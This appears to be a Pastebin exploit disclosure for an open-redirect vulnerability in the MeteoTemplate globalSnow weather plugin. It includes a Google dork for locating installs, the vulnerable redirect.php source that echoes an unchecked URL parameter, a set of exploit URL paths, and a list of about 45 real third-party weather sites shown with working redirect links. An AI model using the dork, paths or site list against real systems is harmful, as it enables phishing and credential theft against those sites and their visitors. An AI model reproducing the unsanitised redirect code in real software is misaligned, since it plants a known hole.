Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : MeteoTemplate 17.1 Nectarine globalSnow Plugins 1.1 Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 07/03/2019
- # Vendor Homepage : meteotemplate.com
- # Software Download Link : meteotemplate.com/web/downloadRequest.php?file=globalSnow_1.1
- # Software Information Link : meteotemplate.com/web/plugins/globalSnow.php
- # Software Affected Versions : 1.0 and 1.1
- Vulnerable Versions for MeteoTemplate
- Meteotemplate 4.1 Mango
- Meteotemplate 6.0 Blueberry
- Meteotemplate 10.0 Banana
- Meteotemplate 11.0 Passion Fruit
- Meteotemplate 13.0 Lemon
- Meteotemplate 16.0 Physalis
- MeteoTemplate 17.0 Nectarine
- MeteoTemplate 17.1 Nectarine
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : inurl:"/plugins/globalSnow/"
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019030061
- ####################################################################
- # Description about Software :
- ***************************
- * A plugin showing current ice and snow in the world as well as in
- particular areas (Europe, US, Canada).
- * World – this one shows several maps of current global snow and ice cover
- * U.S. – this page shows several maps for the United States and also regional maps,
- with the possibility to switch and set default
- * Canada – several maps of Canada, both national and regional
- * Europe – maps of snow cover and precipitation for Europe
- ####################################################################
- # Impact :
- ***********
- This web application MeteoTemplate 17.1 Nectarine globalSnow Plugins 1.1 accepts a user-controlled input that
- specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.
- An http parameter may contain a URL value and could cause the web application to redirect the request to the
- specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam
- and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts
- have a more trustworthy appearance. Open redirect is a failure in that process that makes it possible for attackers
- to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious
- sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name
- has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes
- affected by malware the task of which is to deceive the valid actor and steal his personal data.
- ####################################################################
- # Vulnerable Source Code : [ redirect.php ]
- **************************************
- <?php
- ############################################################################
- #
- # Meteotemplate
- # http://www.meteotemplate.com
- # Free website template for weather enthusiasts
- # Author: Jachym
- # Brno, Czech Republic
- # First release: 2015
- #
- ############################################################################
- #
- # Loading Spinner
- #
- # A script which shows a loading spinner while redirecting.
- #
- ############################################################################
- # Version (change log - http://meteotemplate.com/blog/?page_id=42)
- #
- # v2.0 Watermelon 2015-09-12
- #
- ############################################################################
- include("../../config.php");
- include($baseURL."css/design.php");
- include($baseURL."header.php");
- $address = urldecode($_GET["url"]);
- ?>
- <html>
- <head>
- <?php metaHeader()?>
- <style>
- #loading{
- background-color: transparent;
- height: 100%;
- width: 100%;
- position: fixed;
- z-index: 1;
- margin-top: 0px;
- top: 0px;
- }
- #loading-center{
- width: 100%;
- height: 100%;
- position: relative;
- }
- #loading-center-absolute {
- position: absolute;
- left: 50%;
- top: 50%;
- height: 200px;
- width: 200px;
- margin-top: -100px;
- margin-left: -100px;
- }
- .object{
- -moz-border-radius: 50% 50% 50% 50%;
- -webkit-border-radius: 50% 50% 50% 50%;
- border-radius: 50% 50% 50% 50%;
- position: absolute;
- border-left: 5px solid #FFF;
- border-right: 5px solid #FFF;
- border-top: 5px solid transparent;
- border-bottom: 5px solid transparent;
- -webkit-animation: animate 2s infinite;
- animation: animate 2s infinite;
- }
- #object_one{
- left: 75px;
- top: 75px;
- width: 50px;
- height: 50px;
- }
- #object_two{
- left: 65px;
- top: 65px;
- width: 70px;
- height: 70px;
- -webkit-animation-delay: 0.1s;
- animation-delay: 0.1s;
- }
- #object_three{
- left: 55px;
- top: 55px;
- width: 90px;
- height: 90px;
- -webkit-animation-delay: 0.2s;
- animation-delay: 0.2s;
- }
- #object_four{
- left: 45px;
- top: 45px;
- width: 110px;
- height: 110px;
- -webkit-animation-delay: 0.3s;
- animation-delay: 0.3s;
- }
- @-webkit-keyframes animate {
- 50% {
- -ms-transform: rotate(180deg);
- -webkit-transform: rotate(180deg);
- transform: rotate(180deg);
- }
- 100% {
- -ms-transform: rotate(0deg);
- -webkit-transform: rotate(0deg);
- transform: rotate(0deg);
- }
- }
- @keyframes animate {
- 50% {
- -ms-transform: rotate(180deg);
- -webkit-transform: rotate(180deg);
- transform: rotate(180deg);
- }
- 100% {
- -ms-transform: rotate(0deg);
- -webkit-transform: rotate(0deg);
- transform: rotate(0deg);
- }
- }
- </style>
- </head>
- <body onload="redirectpage()">
- <div id="loading">
- <div id="loading-center">
- <div id="loading-center-absolute">
- <div class="object" id="object_four">
- </div>
- <div class="object" id="object_three">
- </div>
- <div class="object" id="object_two">
- </div>
- <div class="object" id="object_one">
- </div>
- </div>
- </div>
- </div>
- </body>
- <script>
- function redirectpage(){
- window.location.href = "<?php echo $address ?>";
- }
- </script>
- </html>
- ####################################################################
- # Open Redirection Exploit :
- **************************
- /template/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /Meteo/template/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /meteotemplate/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /MeteoTemplate/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /template5/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /weather/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /acu/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /knjazevac/MeteoTemplate/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /MT41/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /pws/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] meteotemplate.com/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] roustika.info/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] weatheromaha.net/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteoalcoletge.com/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteo-arbois.fr/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] slovreme.eu/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] sv2bzq.gr/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] weereefde.nl/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteo-lignerolles.fr/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteoherhet.be/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] orzepowice24.pl/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] terminimeteo.altervista.org/meteotemplate/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteofermo.altervista.org/template5/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteorivalta.altervista.org/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteopino.es/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteodonostia.es/acu/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] tomanddonna.co.uk/weather/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteonieuw-vennep.nl/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] asobig.com/weather/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteotirana.al/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] bdibenedetto.ch/MeteoTemplate/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] vallsjon.se/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] lucdesign.nl/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wustrau.org/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] smaniotto.eu/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] monselicemeteo.altervista.org/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] carlobeolchi.net/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wetter-lehmschlenke.de/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] vreme.in.rs/knjazevac/MeteoTemplate/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wetter-erichshof-weyhe.de/Meteo/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] akker.be/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteolanaudiere.ca/meteo/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wetter-saal-io.de/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wetter-kleve.de/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteo-daoulas.fr/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteobasaldella.it/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] ostarijemet.org/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] ilmeteobrescia.it/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] nexus.byethost32.com/MT41/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wetter.unterwurzacher.at/meteo/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wetter-hiltenfingen.euro-picture.de/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] priamoservice.gr/pws/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wettertotal.de/meteo/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteopaparano.altervista.org/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement